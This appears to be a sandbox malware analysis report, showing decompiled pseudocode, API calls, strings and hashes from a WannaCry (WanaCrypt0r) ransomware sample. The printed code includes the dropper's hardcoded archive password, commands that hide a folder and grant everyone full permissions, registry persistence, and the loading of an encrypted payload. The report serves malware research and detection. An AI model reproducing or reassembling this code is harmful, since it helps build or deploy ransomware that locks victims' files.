					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}





































                                                                                                                                                0x00407136
                                                                                                                                                0x00407136
                                                                                                                                                0x00407140
                                                                                                                                                0x00407148
                                                                                                                                                0x0040714a
                                                                                                                                                0x00407168
                                                                                                                                                0x0040716b
                                                                                                                                                0x0040716e
                                                                                                                                                0x00407170
                                                                                                                                                0x004071b7
                                                                                                                                                0x004071c8
                                                                                                                                                0x004071cd
                                                                                                                                                0x004071cf
                                                                                                                                                0x004071d3
                                                                                                                                                0x004071d8
                                                                                                                                                0x004071d8
                                                                                                                                                0x004071d8
                                                                                                                                                0x004071dc
                                                                                                                                                0x004071dd
                                                                                                                                                0x004071e1
                                                                                                                                                0x004071ea
                                                                                                                                                0x004071ec
                                                                                                                                                0x004071fa
                                                                                                                                                0x00000000
                                                                                                                                                0x00407206
                                                                                                                                                0x00000000
                                                                                                                                                0x004071e3
                                                                                                                                                0x004071e3
                                                                                                                                                0x00000000
                                                                                                                                                0x004071e3
                                                                                                                                                0x004071e1
                                                                                                                                                0x00407172
                                                                                                                                                0x00407175
                                                                                                                                                0x00407179
                                                                                                                                                0x0040717e
                                                                                                                                                0x0040717e
                                                                                                                                                0x0040717f
                                                                                                                                                0x00407181
                                                                                                                                                0x00407185
                                                                                                                                                0x00407188
                                                                                                                                                0x0040715e
                                                                                                                                                0x00000000
                                                                                                                                                0x0040718a
                                                                                                                                                0x0040718a
                                                                                                                                                0x0040718d
                                                                                                                                                0x00407196
                                                                                                                                                0x00407196
                                                                                                                                                0x00407198
                                                                                                                                                0x0040719b
                                                                                                                                                0x004071ad
                                                                                                                                                0x004071b3
                                                                                                                                                0x004071b6
                                                                                                                                                0x00000000
                                                                                                                                                0x004071b6
                                                                                                                                                0x0040719e
                                                                                                                                                0x00407195
                                                                                                                                                0x00000000
                                                                                                                                                0x00407195
                                                                                                                                                0x00407190
                                                                                                                                                0x00000000
                                                                                                                                                0x00407190
                                                                                                                                                0x00407188
                                                                                                                                                0x0040714f
                                                                                                                                                0x00407210
                                                                                                                                                0x00407214
                                                                                                                                                0x00407218
                                                                                                                                                0x0040721d
                                                                                                                                                0x0040721d
                                                                                                                                                0x0040721e
                                                                                                                                                0x00407220
                                                                                                                                                0x00407223
                                                                                                                                                0x00407227
                                                                                                                                                0x0040722a
                                                                                                                                                0x00000000
                                                                                                                                                0x00407230
                                                                                                                                                0x00407230
                                                                                                                                                0x00407233
                                                                                                                                                0x0040723c
                                                                                                                                                0x0040723c
                                                                                                                                                0x0040723e
                                                                                                                                                0x00407241
                                                                                                                                                0x00407255
                                                                                                                                                0x0040725a
                                                                                                                                                0x00407261
                                                                                                                                                0x0040729c
                                                                                                                                                0x0040729f
                                                                                                                                                0x004072a9
                                                                                                                                                0x004072ac
                                                                                                                                                0x004072ae
                                                                                                                                                0x004072b0
                                                                                                                                                0x004072b2
                                                                                                                                                0x004072b2
                                                                                                                                                0x004072b4
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004072b6
                                                                                                                                                0x004072b8
                                                                                                                                                0x004072be
                                                                                                                                                0x004072be
                                                                                                                                                0x004072c1
                                                                                                                                                0x004072c1
                                                                                                                                                0x004072c4
                                                                                                                                                0x00000000
                                                                                                                                                0x004072c4
                                                                                                                                                0x004072ba
                                                                                                                                                0x004072bc
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004072bc
                                                                                                                                                0x004072cf
                                                                                                                                                0x004072d5
                                                                                                                                                0x004072d8
                                                                                                                                                0x00407347
                                                                                                                                                0x0040734f
                                                                                                                                                0x00407356
                                                                                                                                                0x0040737b
                                                                                                                                                0x0040738f
                                                                                                                                                0x0040739e
                                                                                                                                                0x004073a3
                                                                                                                                                0x00407312
                                                                                                                                                0x00407312
                                                                                                                                                0x0040732b
                                                                                                                                                0x00407331
                                                                                                                                                0x00407331
                                                                                                                                                0x00407334
                                                                                                                                                0x00407337
                                                                                                                                                0x004073b3
                                                                                                                                                0x004073b8
                                                                                                                                                0x004073c0
                                                                                                                                                0x004073c6
                                                                                                                                                0x004073c9
                                                                                                                                                0x004073ce
                                                                                                                                                0x004073cf
                                                                                                                                                0x004073cf
                                                                                                                                                0x004073d5
                                                                                                                                                0x004073d5
                                                                                                                                                0x004073d5
                                                                                                                                                0x004073d9
                                                                                                                                                0x004073eb
                                                                                                                                                0x004073ed
                                                                                                                                                0x004073f0
                                                                                                                                                0x004073f3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004073f5
                                                                                                                                                0x004073f7
                                                                                                                                                0x0040742a
                                                                                                                                                0x0040742a
                                                                                                                                                0x0040745a
                                                                                                                                                0x0040745a
                                                                                                                                                0x0040745e
                                                                                                                                                0x00407463
                                                                                                                                                0x00407463
                                                                                                                                                0x0040746b
                                                                                                                                                0x00000000
                                                                                                                                                0x00407473
                                                                                                                                                0x004073f9
                                                                                                                                                0x00407415
                                                                                                                                                0x00407415
                                                                                                                                                0x00407419
                                                                                                                                                0x00407454
                                                                                                                                                0x00000000
                                                                                                                                                0x00407454
                                                                                                                                                0x0040741b
                                                                                                                                                0x0040741d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040741f
                                                                                                                                                0x0040740b
                                                                                                                                                0x00407411
                                                                                                                                                0x00407413
                                                                                                                                                0x00407433
                                                                                                                                                0x00000000
                                                                                                                                                0x00407433
                                                                                                                                                0x00000000
                                                                                                                                                0x00407413
                                                                                                                                                0x00407421
                                                                                                                                                0x00000000
                                                                                                                                                0x00407421
                                                                                                                                                0x00000000
                                                                                                                                                0x00407339
                                                                                                                                                0x00407358
                                                                                                                                                0x0040735f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00407361
                                                                                                                                                0x00407368
                                                                                                                                                0x004072e1
                                                                                                                                                0x004072e7
                                                                                                                                                0x004072fc
                                                                                                                                                0x0040730a
                                                                                                                                                0x0040730f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040730f
                                                                                                                                                0x0040736e
                                                                                                                                                0x00407375
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00407375
                                                                                                                                                0x004072da
                                                                                                                                                0x004072da
                                                                                                                                                0x004072da
                                                                                                                                                0x00000000
                                                                                                                                                0x004072da
                                                                                                                                                0x004072a1
                                                                                                                                                0x00000000
                                                                                                                                                0x004072a1
                                                                                                                                                0x00407263
                                                                                                                                                0x00407266
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040726c
                                                                                                                                                0x0040726f
                                                                                                                                                0x00407271
                                                                                                                                                0x00407273
                                                                                                                                                0x00407283
                                                                                                                                                0x00407283
                                                                                                                                                0x00407284
                                                                                                                                                0x00407290
                                                                                                                                                0x00407290
                                                                                                                                                0x00000000
                                                                                                                                                0x00407296
                                                                                                                                                0x00407275
                                                                                                                                                0x00407277
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00407279
                                                                                                                                                0x0040727b
                                                                                                                                                0x00407288
                                                                                                                                                0x00407288
                                                                                                                                                0x00407288
                                                                                                                                                0x0040728e
                                                                                                                                                0x0040728f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040728f
                                                                                                                                                0x0040727d
                                                                                                                                                0x00407281
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00407281
                                                                                                                                                0x00407244
                                                                                                                                                0x0040723b
                                                                                                                                                0x00000000
                                                                                                                                                0x0040723b
                                                                                                                                                0x00407236
                                                                                                                                                0x00000000
                                                                                                                                                0x00407236
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: %s%s$%s%s%s$:$\
                                                                                                                                                • API String ID: 0-1100577047
                                                                                                                                                • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                                                                                • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                                                                                                                                                • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                                                                                • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106stringfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}









                                                                                                                                                0x00402040
                                                                                                                                                0x00402054
                                                                                                                                                0x0040208e
                                                                                                                                                0x004020a3
                                                                                                                                                0x004020b1
                                                                                                                                                0x004020b3
                                                                                                                                                0x004020bb
                                                                                                                                                0x004020c3
                                                                                                                                                0x004020c8
                                                                                                                                                0x004020cf
                                                                                                                                                0x004020d0
                                                                                                                                                0x004020d5
                                                                                                                                                0x004020e1
                                                                                                                                                0x004020ed
                                                                                                                                                0x004020f5
                                                                                                                                                0x004020fa
                                                                                                                                                0x004020fc
                                                                                                                                                0x00402104
                                                                                                                                                0x00402119
                                                                                                                                                0x0040212a
                                                                                                                                                0x00402134
                                                                                                                                                0x0040214b
                                                                                                                                                0x00402151
                                                                                                                                                0x00402154
                                                                                                                                                0x00402158
                                                                                                                                                0x00402158
                                                                                                                                                0x00402154
                                                                                                                                                0x00402134
                                                                                                                                                0x00402160
                                                                                                                                                0x00402160
                                                                                                                                                0x00000000
                                                                                                                                                0x00402061
                                                                                                                                                0x00402061
                                                                                                                                                0x0040206f
                                                                                                                                                0x0040207f
                                                                                                                                                0x00000000
                                                                                                                                                0x00402165
                                                                                                                                                0x00402165
                                                                                                                                                0x0040216b
                                                                                                                                                0x0040216b
                                                                                                                                                0x0040207f

                                                                                                                                                APIs
                                                                                                                                                • __p___argv.MSVCRT(0040F538), ref: 00402040
                                                                                                                                                • strcmp.MSVCRT(?), ref: 0040204B
                                                                                                                                                • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                                                                                                                                                • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                                                                                                                                                  • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                                                                                                                                                • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                                                                                                                                                • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                                                                                                                                                  • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                                                                                  • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                                                                                  • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                                                                                  • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                                                                                                                                                • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                                                                                                                                                • API String ID: 1074704982-2844324180
                                                                                                                                                • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                                                                                • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                                                                                                                                                • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                                                                                • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100registrystringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}
















                                                                                                                                                0x0040110f
                                                                                                                                                0x00401116
                                                                                                                                                0x00401118
                                                                                                                                                0x0040111c
                                                                                                                                                0x00401129
                                                                                                                                                0x0040113a
                                                                                                                                                0x0040113c
                                                                                                                                                0x0040113e
                                                                                                                                                0x0040114b
                                                                                                                                                0x00401151
                                                                                                                                                0x00401157
                                                                                                                                                0x0040115c
                                                                                                                                                0x00401164
                                                                                                                                                0x0040116b
                                                                                                                                                0x0040116c
                                                                                                                                                0x00401175
                                                                                                                                                0x0040116e
                                                                                                                                                0x0040116e
                                                                                                                                                0x0040116e
                                                                                                                                                0x0040117a
                                                                                                                                                0x00401183
                                                                                                                                                0x0040118c
                                                                                                                                                0x004011cf
                                                                                                                                                0x004011e4
                                                                                                                                                0x004011ee
                                                                                                                                                0x004011f0
                                                                                                                                                0x004011f1
                                                                                                                                                0x004011fa
                                                                                                                                                0x004011fa
                                                                                                                                                0x0040118e
                                                                                                                                                0x0040119a
                                                                                                                                                0x004011bd
                                                                                                                                                0x004011c7
                                                                                                                                                0x004011c9
                                                                                                                                                0x004011c9
                                                                                                                                                0x00401203
                                                                                                                                                0x0040120b
                                                                                                                                                0x00401222
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040120b
                                                                                                                                                0x0040120d
                                                                                                                                                0x0040120d
                                                                                                                                                0x00401210
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                                                                                                                                                • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                                                                                                                                                • strlen.MSVCRT(?), ref: 004011A7
                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                                                                                                                                                • String ID: 0@$Software\$WanaCrypt0r
                                                                                                                                                • API String ID: 865909632-3421300005
                                                                                                                                                • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                                                                                • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                                                                                                                                                • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                                                                                • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}
















                                                                                                                                                0x00401b68
                                                                                                                                                0x00401b80
                                                                                                                                                0x00401b87
                                                                                                                                                0x00401b89
                                                                                                                                                0x00401b95
                                                                                                                                                0x00401b9c
                                                                                                                                                0x00401b9e
                                                                                                                                                0x00401ba0
                                                                                                                                                0x00401bab
                                                                                                                                                0x00401bb4
                                                                                                                                                0x00401bb6
                                                                                                                                                0x00401bca
                                                                                                                                                0x00401bdd
                                                                                                                                                0x00401be9
                                                                                                                                                0x00401c04
                                                                                                                                                0x00401c06
                                                                                                                                                0x00401c19
                                                                                                                                                0x00401c40
                                                                                                                                                0x00401c53
